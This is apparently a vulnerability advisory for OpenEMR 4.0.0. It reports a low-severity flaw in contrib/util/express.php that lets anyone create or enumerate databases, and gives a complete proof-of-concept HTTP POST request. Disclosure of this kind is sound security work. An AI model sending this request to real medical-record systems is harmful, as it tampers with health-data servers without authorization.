------------------------------------------------------------------------ Software................OpenEMR 4.0.0 Vulnerability...........Arbitrary Database Creation/Database Enumeration Threat Level............Low (1/5) Download................http://www.oemr.org/ Discovery Date..........4/2/2011 Tested On...............Windows Vista + XAMPP ------------------------------------------------------------------------ Author..................AutoSec Tools Site....................http://www.autosectools.com/ Email...................John Leitch ------------------------------------------------------------------------ --PoC-- POST http://localhost/openemr-4.0.0/contrib/util/express.php HTTP/1.1 Host: localhost Connection: keep-alive User-Agent: x Content-Length: 142 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="submit" submit ------x Content-Disposition: form-data; name="newname" DatabaseName ------x--